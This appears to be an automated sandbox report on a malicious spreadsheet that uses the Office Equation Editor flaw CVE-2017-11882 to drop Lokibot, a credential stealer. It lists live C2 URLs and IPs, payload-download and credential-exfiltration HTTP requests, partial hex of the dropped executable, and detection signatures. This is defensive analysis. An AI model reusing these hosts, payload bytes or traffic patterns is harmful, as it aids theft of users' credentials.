Windows Analysis Report Shipping-Documents.xlsx

Overview

General Information

Sample Name: Shipping-Documents.xlsx
Analysis ID: 435330
MD5: 20e540ed9d02f60f7fb928ed8fe60f1f
SHA1: afa6c289fbeed004fe3a52c666cf32a8ae444e79
SHA256: 3c48a312d69b2d72bec8b3dad17e99ee1241afff875e97b73569509d5f8b07ec
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/S4wFP8QBww9Tp"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe ReversingLabs: Detection: 10%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Shipping-Documents.xlsx Virustotal: Detection: 40% Perma Link
Source: Shipping-Documents.xlsx ReversingLabs: Detection: 31%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 64MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.89.90.94:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: http://63.141.228.141/32.php/S4wFP8QBww9Tp
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:29:38 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 00:49:42 GMTETag: "ba000-5c4d77753dec3"Accept-Ranges: bytesContent-Length: 761856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 2
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.141.228.141 63.141.228.141
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: NOCIXUS NOCIXUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 149Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: unknown TCP traffic detected without corresponding DNS query: 103.89.90.94
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404ED4 recv, 5_2_00404ED4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /pzldoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.89.90.94Connection: Keep-Alive
Source: unknown HTTP traffic detected: POST /32.php/S4wFP8QBww9Tp HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B78A3212Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Jun 2021 10:29:47 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
Source: vbc.exe, 00000005.00000002.2182254082.00000000008D4000.00000004.00000020.sdmp String found in binary or memory: http://63.141.228.141/32.php/S4wFP8QBww9Tp
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2170728064.0000000002361000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2182608909.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: A6AB76E0.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, vbc.exe, 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe String found in binary or memory: https://github.com/georgw777/
Source: vbc.exe String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2161017267.0000000000D02000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2168355610.0000000000D02000.00000020.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E90E1 4_2_002E90E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EC3D0 4_2_002EC3D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBB78 4_2_002EBB78
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EDDA8 4_2_002EDDA8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002ECE76 4_2_002ECE76
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E555A 4_2_002E555A
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EF8D8 4_2_002EF8D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBA83 4_2_002EBA83
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EBAD0 4_2_002EBAD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EED48 4_2_002EED48
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E2D80 4_2_002E2D80
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4F60 4_2_002E4F60
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EAFB2 4_2_002EAFB2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00615819 4_2_00615819
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610048 4_2_00610048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00615CE0 4_2_00615CE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_006148C4 4_2_006148C4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00616080 4_2_00616080
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610548 4_2_00610548
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610538 4_2_00610538
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610270 4_2_00610270
Source: C:\Users\Public\vbc.exe Code function: 4_2_00616650 4_2_00616650
Source: C:\Users\Public\vbc.exe Code function: 4_2_00613658 4_2_00613658
Source: C:\Users\Public\vbc.exe Code function: 4_2_006112A8 4_2_006112A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610280 4_2_00610280
Source: C:\Users\Public\vbc.exe Code function: 4_2_00610728 4_2_00610728
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040549C 5_2_0040549C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004029D4 5_2_004029D4
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Shipping-Documents.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00405B6F appears 42 times
Searches the installation path of Mozilla Firefox
Source: C:\Users\Public\vbc.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Yara signature match
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
